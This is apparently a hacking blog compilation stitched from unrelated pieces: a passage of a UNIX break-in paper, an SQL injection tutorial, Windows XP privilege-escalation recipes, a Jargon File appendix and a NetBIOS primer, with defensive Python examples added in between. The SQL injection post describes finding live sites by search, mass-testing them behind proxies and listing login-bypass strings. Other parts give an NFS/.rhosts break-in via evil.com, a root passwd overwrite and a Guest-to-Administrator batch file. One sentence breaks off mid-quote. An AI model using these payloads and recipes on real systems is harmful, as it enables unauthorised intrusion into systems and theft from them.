attacks are also covered here.
The third section deals with trust: how the security of one system
depends on the integrity of other systems. Trust is the most complex
subject in this paper, and for the sake of brevity we will limit the
discussion to clients in disguise.
The fourth section covers the basic steps that a system administrator
may take to protect her or his system. Most of the methods presented
here are merely common sense, but they are often ignored in practice --
one of our goals is to show just how dangerous it can be to ignore basic
security practices.
Case studies, pointers to security-related information, and software are
described in the appendices at the end of the paper.
While exploring the methods and strategies discussed in this paper we
wrote SATAN (Security Analysis Tool for Auditing Networks). Written in
shell, perl, expect and C, it examines a remote host or set of hosts and
gathers as much information as possible by remotely probing NIS, finger,
NFS, ftp and tftp, rexd, and other services. This information includes
the presence of various network information services as well as
potential security flaws -- usually in the form of incorrectly setup or
configured network services, well-known bugs in system or network
utilities, or poor or ignorant policy decisions. It then can either
report on this data or use an expert system to further investigate any
potential security problems. While SATAN doesn't use all of the methods
that we discuss in the paper, it has succeeded with ominous regularity
in finding serious holes in the security of Internet sites. It will be
posted and made available via anonymous ftp when completed; Appendix A
covers its salient features.
Note that it isn't possible to cover all possible methods of breaking
into systems in a single paper. Indeed, we won't cover two of the most
effective methods of breaking into hosts: social engineering and
password cracking. The latter method is so effective, however, that
several of the strategies presented here are geared towards acquiring
password files. In addition, while windowing systems (X, OpenWindows,
etc.) can provide a fertile ground for exploitation, we simply don't
know many methods that are used to break into remote systems. Many
system crackers use non-bitmapped terminals which can prevent them from
using some of the more interesting methods to exploit windowing systems
effectively (although being able to monitor the victim's keyboard is
often sufficient to capture passwords). Finally, while worms, viruses,
trojan horses, and other malware are very interesting, they are not
common (on UNIX systems) and probably will use similar techniques to the
ones we describe in this paper as individual parts to their attack
strategy.
Gaining Information
-------------------
Let us assume that you are the head system administrator of Victim
Incorporated's network of UNIX workstations. In an effort to secure
your machines, you ask a friendly system administrator from a nearby
site (evil.com) to give you an account on one of her machines so that
you can look at your own system's security from the outside.
What should you do? First, try to gather information about your
(target) host. There is a wealth of network services to look at:
finger, showmount, and rpcinfo are good starting points. But don't stop
there -- you should also utilize DNS, whois, sendmail (smtp), ftp, uucp,
and as many other services as you can find. There are so many methods
and techniques that space precludes us from showing all of them, but we
will try to show a cross-section of the most common and/or dangerous
strategies that we have seen or have thought of. Ideally, you would
gather such information about all hosts on the subnet or area of attack
-- information is power -- but for now we'll examine only our intended
target.
To start out, you look at what the ubiquitous finger command shows you
(assume it is 6pm, Nov 6, 1993):
victim % finger @victim.com
[victim.com]
Login    Name          TTY  Idle  When        Where
zen      Dr. Fubar     co   1d    Wed 08:00   death.com
Good! A single idle user -- it is likely that no one will notice if you
actually manage to break in.
Now you try more tactics. As every finger devotee knows, fingering "@",
"0", and "", as well as common names, such as root, bin, ftp, system,
guest, demo, manager, etc., can reveal interesting information. What
that information is depends on the version of finger that your target is
running, but the most notable are account names, along with their home
directories and the host that they last logged in from.
To add to this information, you can use rusers (in particular with the
-l flag) to get useful information on logged-in users.
Trying these commands on victim.com reveals the following information,
presented in a compressed tabular form to save space:
Login    Home-dir       Shell        Last login, from where
-----    --------       -----        ----------------------
root     /              /bin/sh      Fri Nov 5 07:42 on ttyp1 from big.victim.com
bin      /bin                        Never logged in
nobody   /                           Tue Jun 15 08:57 on ttyp2 from server.victim.co
daemon   /                           Tue Mar 23 12:14 on ttyp0 from big.victim.com
sync     /              /bin/sync    Tue Mar 23 12:14 on ttyp0 from big.victim.com
zen      /home/zen      /bin/bash    On since Wed Nov 6 on ttyp3 from death.com
sam      /home/sam      /bin/csh     Wed Nov 5 05:33 on ttyp3 from evil.com
guest    /export/foo    /bin/sh      Never logged in
ftp      /home/ftp                   Never logged in
Both our experiments with SATAN and watching system crackers at work
have proved to us that finger is one of the most dangerous services,
because it is so useful for investigating a potential target. However,
much of this information is useful only when used in conjunction with
other data.
For instance, running showmount on your target reveals:
evil % showmount -e victim.com
export list for victim.com:
/export (everyone)
/var (everyone)
/usr easy
/export/exec/kvm/sun4c.sunos.4.1.3 easy
/export/root/easy easy
/export/swap/easy easy
Note that /export/foo is exported to the world; also note that this is
user guest's home directory. Time for your first break-in! In this
case, you'll mount the home directory of user "guest." Since you don't
have a corresponding account on the local machine and since root cannot
modify files on an NFS mounted filesystem, you create a "guest" account
in your local password file. As user guest you can put an .rhosts entry
in the remote guest home directory, which will allow you to login to the
target machine without having to supply a password.
evil # mount victim.com:/export/foo /foo
evil # cd /foo
evil # ls -lag
total 3
1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .
1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..
1 drwx--x--x 9 10001 daemon 1024 Aug 3 15:49 guest
evil # echo guest:x:10001:1:temporary breakin account:/: >> /etc/passwd
evil # ls -lag
total 3
1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .
1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..
1 drwx--x--x 9 guest daemon 1024 Aug 3 15:49 guest
evil # su guest
evil % echo evil.com >> guest/.rhosts
evil % rlogin victim.com
Welcome to victim.com!
victim %
If, instead of home directories, victim.com were exporting filesystems
with user commands (say, /usr or /usr/local/bin), you could replace a
command with a trojan horse that executes any command of your choice.
The next user to execute that command would execute your program.
We suggest that filesystems be exported:
o Read/write only to specific, trusted clients.
o Read-only, where possible (data or programs can often be
exported in this manner.)
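The two pieces of information that made the break-in above possible (a world-mountable export, and a user whose home directory lives inside it) can be cross-checked automatically. The following Python program is an added example, not part of the paper or of SATAN: it parses the `showmount -e` output quoted above (embedded here as a constructed string) together with the login/home-directory pairs gathered with finger and rusers, and reports every export that anyone may mount and every home directory that falls inside such an export. The helper names and the `HOME_DIRS` table are assumptions made for the example.

```python
from typing import Dict, List, Tuple

# Constructed sample: the `showmount -e victim.com` output quoted above,
# embedded as a string so the check runs offline.
SHOWMOUNT_OUTPUT = """\
export list for victim.com:
/export (everyone)
/var (everyone)
/usr easy
/export/exec/kvm/sun4c.sunos.4.1.3 easy
/export/root/easy easy
/export/swap/easy easy
"""

# Constructed sample: login -> home directory, as gathered with finger and
# rusers above (entries without a listed home directory are omitted).
HOME_DIRS = {
    "root": "/",
    "zen": "/home/zen",
    "sam": "/home/sam",
    "guest": "/export/foo",
    "ftp": "/home/ftp",
}


def parse_showmount(output: str) -> Dict[str, List[str]]:
    """Map each exported path to the client list showmount -e prints for it.

    Lines after the 'export list for' header read '<path> <clients>', where
    <clients> is a comma-separated list of hosts/netgroups or the literal
    token '(everyone)' meaning the export carries no client restriction.
    """
    exports: Dict[str, List[str]] = {}
    for line in output.splitlines()[1:]:
        parts = line.split()
        if len(parts) < 2:
            continue
        exports[parts[0]] = parts[1].split(",")
    return exports


def world_exports(exports: Dict[str, List[str]]) -> List[str]:
    """Exports that any host on the network may mount."""
    return sorted(path for path, clients in exports.items()
                  if "(everyone)" in clients)


def exposed_home_dirs(exports: Dict[str, List[str]],
                      home_dirs: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """(login, home, export) for every home directory that lies inside a
    world-mountable export: exactly the condition that let an outsider
    plant an .rhosts file in guest's home directory above."""
    hits = []
    for export in world_exports(exports):
        prefix = export.rstrip("/") + "/"
        for login, home in home_dirs.items():
            if home == export or home.startswith(prefix):
                hits.append((login, home, export))
    return sorted(hits)


if __name__ == "__main__":
    exports = parse_showmount(SHOWMOUNT_OUTPUT)
    print("world-mountable exports:", world_exports(exports))
    for login, home, export in exposed_home_dirs(exports, HOME_DIRS):
        print("home of %s (%s) is reachable through export %s"
              % (login, home, export))
```

Run against the sample it flags /export and /var as mountable by everyone and reports that guest's home directory /export/foo sits inside /export; on a real host you would feed it the output of `showmount -e` and the home directories from the password file instead of the constructed strings.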
If the target has a "+" wildcard in its /etc/hosts.equiv (the default on
various vendors' machines) or has the netgroups bug (CERT advisory
91:12), any non-root user with a login name in the target's password
file can rlogin to the target without a password. And since the user
"bin" often owns key files and directories, your next attack is to try
to log in to the target host and modify the password file to let you
have root access:
evil % whoami
bin
evil % rsh victim.com csh -i
Warning: no access to tty; thus no job control in this shell...
victim % ls -ldg /etc
drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc
victim % cd /etc
victim % mv passwd pw.old
victim % (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd
victim % ^D
evil % rlogin victim.com -l toor
Welcome to victim.com!
victim #
A few notes about the method used above; "rsh victim.com
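Both attacks in this section rest on trust files: the "+" wildcard in /etc/hosts.equiv and the .rhosts entry planted in guest's home directory. The following Python program is an added example, not part of the paper, showing the check an administrator would run over those files. It treats each non-comment line as "host [user]", flags a "+" in either field, and flags any host outside the site's own domain; the sample file contents are constructed, the domain name "victim.com" is taken from the paper, and the function name `audit_equiv` and its `trusted_domain` parameter are assumptions of the example.

```python
from typing import List, Tuple

# Constructed sample of an /etc/hosts.equiv that still carries the vendor
# default "+" line, plus a few ordinary entries.
HOSTS_EQUIV = """\
# /etc/hosts.equiv -- constructed sample
+
big.victim.com
server.victim.com sam
-bad.example.com
@trusted-netgroup
"""

# Constructed sample of the .rhosts the intruder appended to above.
RHOSTS_PLANTED = "evil.com\n"

HOST_WILDCARD = "host wildcard: every host on the network is trusted"
USER_WILDCARD = "user wildcard: every user on the host is trusted"


def audit_equiv(text: str, trusted_domain: str) -> List[Tuple[str, str]]:
    """Return (line, reason) findings for hosts.equiv or .rhosts content.

    Each entry is "host [user]". A "+" host trusts every machine that can
    reach the rlogin/rsh port; a "+" user trusts every account on that
    host; a host outside trusted_domain extends trust to a machine the
    site does not administer. Lines starting with "-" (explicit denial)
    or "@" (netgroup) are not judged here beyond the wildcard checks.
    """
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blanks
        if not line:
            continue
        fields = line.split()
        host = fields[0]
        user = fields[1] if len(fields) > 1 else None
        if host == "+":
            findings.append((line, HOST_WILDCARD))
        if user == "+":
            findings.append((line, USER_WILDCARD))
        if host == "+" or host.startswith(("-", "@")):
            continue
        if not host.endswith("." + trusted_domain) and host != trusted_domain:
            findings.append((line, "host outside %s" % trusted_domain))
    return findings


if __name__ == "__main__":
    for name, content in (("/etc/hosts.equiv", HOSTS_EQUIV),
                          ("~guest/.rhosts", RHOSTS_PLANTED)):
        for line, reason in audit_equiv(content, "victim.com"):
            print("%s: %r: %s" % (name, line, reason))
```

On the samples the hosts.equiv line "+" is reported as a host wildcard and the planted .rhosts entry is reported as a host outside victim.com; running the same function over every user's .rhosts file (they are what the NFS attack above writes) is the natural extension.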
SQL injection Basic Tutorial
One of the major problems with SQL is its poor security surrounding login and URL strings.
this tutorial is not going to go into detail on why these strings work
SEARCH:
admin\login.asp
login.asp
with these two search strings you will have plenty of targets to choose from...finding one that's vulnerable is another question
WHAT I DO :
first let me go into details on how i go about my research
i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs...legally cool...provided by my good friend Gsecur aka ICE..also an Astal member.. http://governmentsecurity.org "thanks mate" .. gives me a chance to concentrate on what am doing and not be looking over my shoulder
INJECTION STRINGS:HOW ?
this is the easiest part...very simple
on the login page just enter something like
user:admin (you dont even have to put this.)
pass:' or 1=1--
or
user:' or 1=1--
admin:' or 1=1--
some sites will have just a password so
password:' or 1=1--
in fact i have compiled a combo list with strings like this to use on my chosen targets ....there are plenty of strings about , the list below is a sample of the most commonly used
there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths...but thats another paper
the one am interested in are quick access to targets
PROGRAM
i tried several programs to use with these search strings and up to now only Ares has performed well with quite a bit
of success with a combo list formatted this way,yesterday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go through 40 sites cutting and pasting each string ??
combo example:
admin:' or a=a--
admin:' or 1=1--
and so on...it doesn't have to be admin can be anything you want... the most important part is example:' or 1=1-- this is our injection
string
now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp or whatever
inurl:login.asp
index of:/admin/login.asp
like this: index of login.asp
result:
http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search
17,000 possible targets trying various searches spews out plenty more
now using proxys set in my browser i then click through interesting targets...seeing whats what on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so
http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp
and so on...in a couple of hours you can build up quite a list...reason i don't select all results or spider for login pages is
i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so too slow for me
i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list...start..now i dont want to go into
problems with users using Ares..thing is i know it works for me...
sit back and wait...any target vulnerable will show up in the hits box...now when it finds a target it will spew all the strings on that site as vulnerable...you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site ...really i need a program that will return the hit with a click on url and ignore false outputs
am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable.
there you go you should have access to your vulnerable target by now
another thing you can use the strings in the urls where user=? edit the url to the = part and paste ' or 1=1-- so it becomes
user=' or 1=1-- just as quick as login process
(Variations)
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
happy hunting
*******************************************
WARNING: the information provided is for educational purposes only and not to be used for malicious use. i hold no responsibility
for your actions...do the right thing and let admins know ay
******************************************
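The post does not explain why the strings above work or how a login page is fixed, so here is an added example (not part of the post, and not code from any site it mentions) using Python's standard sqlite3 module. It builds a constructed two-row users table, runs the same login query once by string concatenation and once with bound parameters, and shows that `' or 1=1--` returns a row from the first form and nothing from the second. The table layout, the sample credentials and the function names are assumptions of the example.

```python
import sqlite3
from typing import Optional


def make_db() -> sqlite3.Connection:
    """In-memory users table with constructed sample rows.

    Passwords are stored in clear here only to keep the example short;
    a real application stores a salted hash and compares against that."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "correct horse"), ("sam", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str,
                     password: str) -> Optional[str]:
    """The pattern behind the login pages in the post: the submitted text is
    pasted into the SQL. A password of  ' or 1=1--  turns the WHERE clause
    into  username = 'admin' AND password = '' or 1=1  (the -- comments out
    the dangling quote), and AND binds tighter than OR, so every row matches."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn: sqlite3.Connection, username: str,
                        password: str) -> Optional[str]:
    """Hardened form: the statement is fixed and the values are bound, so the
    driver passes the quote, OR and comment characters as literal data."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    probe = "' or 1=1--"
    print("vulnerable:    ", login_vulnerable(db, "admin", probe))
    print("parameterized: ", login_parameterized(db, "admin", probe))
    print("real login:    ", login_parameterized(db, "sam", "hunter2"))
```

The only difference between the two functions is whether the user-supplied text is part of the SQL or a bound value; every string in the variations list above fails against the parameterized form for the same reason, and a web log that records the submitted username field will show these strings verbatim, which is the simplest detection.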
SATURDAY, OCTOBER 27, 2007
Helping Hacker Culture Grow
If you enjoyed the Jargon File, please help the culture that created it grow and flourish. Here are several ways you can help:
* If you are a writer or journalist, don't say or write hacker when you mean cracker. If you work with writers or journalists, educate them on this issue and push them to do the right thing. If you catch a newspaper or magazine abusing the word `hacker', write them and straighten them out (this appendix includes a model letter).
* If you're a techie or computer hobbyist, get involved with one of the free Unixes. Toss out that lame Microsoft OS, or confine it to one disk partition and put Linux or FreeBSD or NetBSD on the other one. And the next time your friend or boss is thinking about some commercial software `solution' that costs more than it's worth, be ready to blow the competition away with free software running over a free Unix.
* Contribute to organizations like the Free Software Foundation that promote the production of high-quality free software. You can reach the Free Software Foundation at gnu@prep.ai.mit.edu, by phone at +1-617-542-5942, or by snail-mail at 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
* Support the League for Programming Freedom, which opposes over-broad software patents that constantly threaten to blow up in hackers' faces, preventing them from developing innovative software for tomorrow's needs. You can reach the League for Programming Freedom at lpf@uunet.uu.net, by phone at +1 617 621 7084, or by snail-mail at 1 Kendall Square #143, P.O.Box 9171, Cambridge, Massachusetts 02139 USA.
* If you do nothing else, please help fight government attempts to seize political control of Internet content and restrict strong cryptography. As TNHD III went to press, the so-called `Communications Decency Act' had just been declared "unconstitutional on its face" by a Federal court, but the government is expected to appeal. If it's still law when you read this, please join the effort by the Citizens' Internet Empowerment Coalition lawsuit to have the CDA quashed or repealed. Surf to the Center for Democracy and Technology's home page at http://www.cdt.org to see what you can do to help fight censorship of the net.
Here's the text of a letter RMS wrote to the Wall Street Journal to complain about their policy of using "hacker" only in a pejorative sense. We hear that most major newspapers have the same policy. If you'd like to help change this situation, send your favorite newspaper the same letter -- or, better yet, write your own letter.
Dear Editor:
This letter is not meant for publication, although you can publish it if you wish. It is meant specifically for you, the editor, not the public.
I am a hacker. That is to say, I enjoy playing with computers -- working with, learning about, and writing clever computer programs. I am not a cracker; I don't make a practice of breaking computer security.
There's nothing shameful about the hacking I do. But when I tell people I am a hacker, people think I'm admitting something naughty -- because newspapers such as yours misuse the word "hacker", giving the impression that it means "security breaker" and nothing else. You are giving hackers a bad name.
The saddest thing is that this problem is perpetuated deliberately. Your reporters know the difference between "hacker" and "security breaker". They know how to make the distinction, but you don't let them! You insist on using "hacker" pejoratively. When reporters try to use another word, you change it. When reporters try to explain the other meanings, you cut it.
Of course, you have a reason. You say that readers have become used to your insulting usage of "hacker", so that you cannot change it now. Well, you can't undo past mistakes today; but that is no excuse to repeat them tomorrow.
If I were what you call a "hacker", at this point I would threaten to crack your computer and crash it. But I am a hacker, not a cracker. I don't do that kind of thing! I have enough computers to play with at home and at work; I don't need yours. Besides, it's not my way to respond to insults with violence. My response is this letter.
You owe hackers an apology; but more than that, you owe us ordinary respect.
Sincerely, etc.
MONDAY, SEPTEMBER 3, 2007
some links
http://www.showmyip.com/
http://sainathgupta-hacking.blogspot.com/
http://www.securitytaskforce.org/
http://www.blackhat.com/
http://www.blackhat.com/html/bh-usa-06/bh-usa-06-speakers.html
http://www.nag.co.in/ncise.htm
http://www.wtcs.org/snmp4tpc/freeware.htm
http://www.wireshark.org/
http://www.grc.com/default.htm
http://www.thinkdigit.com/index.php?action=pro_how_to&prodid=679
http://www.snort.org/
http://prasadswork.blogspot.com/
http://crack0hack.wetpaint.com/?t=anon
http://www.discoverhacking.c-o.in/
http://crack0hack.wetpaint.com/page/Best+Hacking+Softwares_+1000sw%28Free+download%29
http://www.remote-exploit.org/backtrack_download.html
http://crack0hack.wetpaint.com/rss2_0/pageReport/created?t=anon
THURSDAY, AUGUST 30, 2007
Hack admin from XP guest account (that's possible)
Well, that's possible..
Please don't misuse this article. It's meant for "educational purposes" only, or for helping those who have lost their password.
Hack "GUEST" with Admin privileges........
@echo off
title Please wait...
cls
rem create a new local account: net user <name> <password> /add
net user Username Password /add
rem add it to the local Administrators group (net localgroup, not net user)
net localgroup Administrators Username /add
rem enable the built-in Guest account and set its password to 420
net user Guest 420 /active:yes
rem move Guest from the Guests group into Administrators
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
rem note: every net user/net localgroup change above succeeds only when the
rem caller is already a member of Administrators
del %0
Copy this to Notepad and save the file as "Guest2admin.bat";
then you can double-click the file to execute it, or run it from cmd.
it works...
~ Cheers ~
* Hacking "admin" from "user" mode and more
really that is possible !
you know why it is a "user" account: because it lacks some service layer that the "administrator" account has
Using simple command line tools on a machine running Windows XP we will obtain system level privileges, and run the entire explorer process (Desktop), and all processes that run from it have system privileges. The system run level is higher than administrator, and has full control of the operating system and its kernel. On many machines this can be exploited even with the guest account. At the time I'm publishing this, I have been unable to find any other mention of people running an entire desktop as system, although I have seen some articles regarding the SYSTEM command prompt.
Local privilege escalation is useful on any system that a hacker may compromise; the system account allows for several other things that aren’t normally possible (like resetting the administrator password).
The Local System account is used by the Windows OS to control various aspects of the system (kernel, services, etc); the account shows up as SYSTEM in the Task Manager
Local System differs from an Administrator account in that it has full control of the operating system, similar to root on a *nix machine. Most System processes are required by the operating system, and cannot be closed, even by an Administrator account; attempting to close them will result in an error message. The following quote from Wikipedia explains this in an easy to understand way:
You can trick the system into running a program, script, or batch file with system level privileges.
One sample
One trick is to use a vulnerability in Windows long filename support.
Try placing an executable named Program.* in the root directory of the "Windows" drive, then reboot. The system may run Program.* with system level privileges, so long as one of the applications in the "Program Files" directory is a startup app: the call to "Program Files" will be intercepted by Program.*.
Microsoft eventually caught on to that trick. Nowadays, more and more of the startup applications are being coded to use limited privileges.
Quote:
In Windows NT and later systems derived from it (Windows 2000, Windows XP, Windows Server 2003 and Windows Vista), there may or may not be a superuser. By default, there is a superuser named Administrator, although it is not an exact analogue of the Unix root superuser account. Administrator does not have all the privileges of root because some superuser privileges are assigned to the Local System account in Windows NT.
Under normal circumstances, a user cannot run code as System, only the operating system itself has this ability, but by using the command line, we will trick Windows into running our desktop as System, along with all applications that are started from within.
Getting SYSTEM
I will now walk you through the process of obtaining SYSTEM privileges.
To start, let's open up a command prompt (Start > Run > cmd > [ENTER]).
At the prompt, enter the following command, then press [ENTER]:
Code:
at
If it responds with an "access denied" error, then we are out of luck, and you'll have to try another method of privilege escalation; if it responds with "There are no entries in the list" (or sometimes with multiple entries already in the list) then we are good. Access to the at command varies: on some installations of Windows even the Guest account can use it, on others it is limited to Administrator accounts. If you can use the at command, enter the following command, then press [ENTER]:
Code:
at 15:25 /interactive "cmd.exe"
Let's break down the preceding command. "at" runs the at command; everything after it consists of the command's arguments. The important thing here is to change the time (24-hour format) to one minute after the time currently shown on your computer's clock. For example, if your computer's clock says it's 4:30pm, convert this to 24-hour format (16:30) and use 16:31 as the time in the command. If you issue the at command again with no arguments, you should see something similar to this:
When the system clock reaches the time you set, then a new command prompt will magically run. The difference is that this one is running with system privileges (because it was started by the task scheduler service, which runs under the Local System account). It should look like this:
You'll notice that the title bar has changed from cmd.exe to svchost.exe (short for Service Host). Now that we have our system command prompt, you may close the old one. Run Task Manager either by pressing CTRL+ALT+DELETE or by typing taskmgr at the command prompt. In Task Manager, go to the Processes tab and kill explorer.exe; your desktop and all open folders should disappear, but the system command prompt should still be there.
At the system command prompt, enter in the following:
Code:
explorer.exe
A desktop will come back up, but what's this? It isn't your desktop. Go to the Start menu and look at the user name; it should say "SYSTEM". Also open up Task Manager again, and you'll notice that explorer.exe is now running as SYSTEM. The easiest way to get back into your own desktop is to log out and then log back in. The following two screenshots show my results (click to zoom):
System user name on start menu
explorer.exe running under SYSTEM
What to do now
Now that we have SYSTEM access, everything that we run from our explorer process will have it too: browsers, games, etc. You also have the ability to reset the administrator's password and kill other processes owned by SYSTEM. You can do anything on the machine, the equivalent of root; you are now God of the Windows machine. I'll leave the rest up to your imagination.
ADMINISTRATOR IN WELCOME SCREEN.
When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode.
First you must ensure that the Administrator Account is enabled:
1 open Control Panel
2 open Administrative Tools
3 open Local Security Policy
4 expand Local Policies
5 click on Security Options
6 ensure that Accounts: Administrator account status is enabled
Then follow the instructions from the "Win2000 Logon Screen Tweak", i.e.:
1 open Control Panel
2 open User Accounts
3 click Change the way users log on or log off
4 untick Use the Welcome Screen
5 click Apply Options
You will now be able to log on to Windows XP as Administrator in Normal Mode.
EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN!
Start the Registry Editor and go to:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Right-click an empty space in the right pane and select New > DWORD Value. Name the new value Administrator. Double-click this new value and enter 1 as its Value data. Close the Registry Editor and restart.
Enjoy
Please don't misuse this article. It's meant for "Educational Purpose" only, or for helping those who have lost their password.
HaCk "GUEST" with Admin privileges........
@echo off
title Please wait...
cls
rem every net command below only succeeds when run from an account that is already an Administrator
net user Username Password /add
net localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /delete
net localgroup Administrators Guest /add
del %0
Copy this to Notepad and save the file as "Guest2admin.bat";
then you can double-click the file to execute it, or run it from cmd.
It works...
~ Cheers ~
* Hacking "admin" from "user" mode and more
Really, that is possible!
You know why it is a "user" account: because it lacks some service layer that the "administrator" account has.
MONDAY, AUGUST 27, 2007
NetBios Basic Tutorial !
I bet you want to try your hand at ethical hacking but are unaware of basic NetBIOS, which is a very important aspect, and this is the best explanation I can offer you, written in much simpler language.
~cheers~
Preface to NetBIOS
Before you begin reading this section, understand that this section was written for the novice to the concept of NetBIOS, but it also contains information the veteran might find educational. I am prefacing this so that I do not get e-mail like "Why did you start your NetBIOS section off so basic?" Simple: it's written for people that may be coming from an environment that does not use NetBIOS, so they would need me to start with the basics, thanks.
What is NetBIOS?
NetBIOS (Network Basic Input/Output System) was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. Since its creation, NetBIOS has become the basis for many other networking applications. In its strictest sense, NetBIOS is an interface specification for accessing networking services.
NetBIOS, a layer of software developed to link a network operating system with specific hardware, was originally designed as THE network controller for IBM's Network LAN. NetBIOS has now been extended to allow programs written using the NetBIOS interface to operate on the IBM token ring architecture. NetBIOS has since been adopted as an industry standard and now, it is common to refer to NetBIOS-compatible LANs.
It offers network applications a set of "hooks" to carry out inter-application communication and data transfer. In a basic sense, NetBIOS allows applications to talk to the network. Its intention is to isolate application programs from any type of hardware dependencies. It also spares software developers the task of developing network error recovery and low level message addressing or routing. The use of the NetBIOS interface does a lot of this work for them.
NetBIOS standardizes the interface between applications and a LAN's operating capabilities. With this, it can be specified to which levels of the OSI model the application can write, making the application transportable to other networks. In a NetBIOS LAN environment, computers are known on the system by a name. Each computer on the network has a permanent name that is programmed in various different ways. These names will be discussed in more detail below.
PCs on a NetBIOS LAN communicate either by establishing a session or by using NetBIOS datagram or broadcast methods. Sessions allow for a larger message to be sent and handle error detection and correction. The communication is on a one-to-one basis. Datagram and broadcast methods allow one computer to communicate with several other computers at the same time, but are limited in message size. There is no error detection or correction using these datagram or broadcast methods. However, datagram communication allows for communication without having to establish a session.
All communication in these environments is presented to NetBIOS in a format called Network Control Blocks (NCBs). The allocation of these blocks in memory is dependent on the user program. These NCBs are divided into fields, which are reserved for input and output respectively.
NetBIOS is a very common protocol used in today's environments. NetBIOS is supported on Ethernet, Token Ring, and IBM PC Networks. In its original form, it was defined as only an interface between the application and the network adapter. Since then, transport-like functions have been added to NetBIOS, making it more functional over time.
In NetBIOS, connection-oriented (TCP) and connectionless (UDP) communication are both supported. It supports both broadcasts and multicasting and supports three distinct services: Naming, Session, and Datagram.
NetBIOS Names
NetBIOS names are used to identify resources on a network. Applications use these names to start and end sessions. You can configure a single machine with multiple applications, each of which has a unique NetBIOS name. Each PC that supports an application also has a NetBIOS station name that is user defined or that NetBIOS derives by internal means.
NetBIOS names can consist of up to 16 alphanumeric characters. The combination of characters must be unique within the entire source routing network. Before a PC that uses NetBIOS can fully function on a network, that PC must register its NetBIOS name.
When a client becomes active, the client advertises its name. A client is considered to be registered when it can successfully advertise itself without any other client claiming it has the same name. The steps of the registration process are as follows:
1. Upon boot up, the client broadcasts itself and its NetBIOS information anywhere from 6 to 10 times to ensure every other client on the network receives the information.
2. If another client on the network already has the name, that NetBIOS client issues its own broadcast to indicate that the name is in use. The client who is trying to register the already in use name stops all attempts to register that name.
3. If no other client on the network objects to the name registration, the client will finish the registration process.
There are two types of names in a NetBIOS environment: Unique and Group. A unique name must be unique across the network. A group name does not have to be unique, and all processes that have a given group name belong to the group. Each NetBIOS node maintains a table of all names currently owned by that node.
The NetBIOS naming convention allows for 16 characters in a NetBIOS name. Microsoft, however, limits these names to 15 characters and uses the 16th character as a NetBIOS suffix. A NetBIOS suffix is used by Microsoft Networking software to identify the functionality installed or the registered device or service.
[QuickNote: SMB and NBT (NetBIOS over TCP/IP) work very closely together and both use ports 137, 138 and 139. Port 137 is NetBIOS name (UDP). Port 138 is NetBIOS datagram (UDP). Port 139 is NetBIOS session (TCP). For further information on NetBIOS, read the paper at the rhino9 website listed above.]
The following is a table of NetBIOS suffixes currently used by Microsoft Windows NT. These suffixes are displayed in hexadecimal format.
Name                 Number(h)  Type  Usage
==========================================================================
<computername>       00         U     Workstation Service
<computername>       01         U     Messenger Service
<\\_MSBROWSE_>       01         G     Master Browser
<computername>       03         U     Messenger Service
<computername>       06         U     RAS Server Service
<computername>       1F         U     NetDDE Service
<computername>       20         U     File Server Service
<computername>       21         U     RAS Client Service
<computername>       22         U     Exchange Interchange
<computername>       23         U     Exchange Store
<computername>       24         U     Exchange Directory
<computername>       30         U     Modem Sharing Server Service
<computername>       31         U     Modem Sharing Client Service
<computername>       43         U     SMS Client Remote Control
<computername>       44         U     SMS Admin Remote Control Tool
<computername>       45         U     SMS Client Remote Chat
<computername>       46         U     SMS Client Remote Transfer
<computername>       4C         U     DEC Pathworks TCPIP Service
<computername>       52         U     DEC Pathworks TCPIP Service
<computername>       87         U     Exchange MTA
<computername>       6A         U     Exchange IMC
<computername>       BE         U     Network Monitor Agent
<computername>       BF         U     Network Monitor Apps
<username>           03         U     Messenger Service
<domain>             00         G     Domain Name
<domain>             1B         U     Domain Master Browser
<domain>             1C         G     Domain Controllers
<domain>             1D         U     Master Browser
<domain>             1E         G     Browser Service Elections
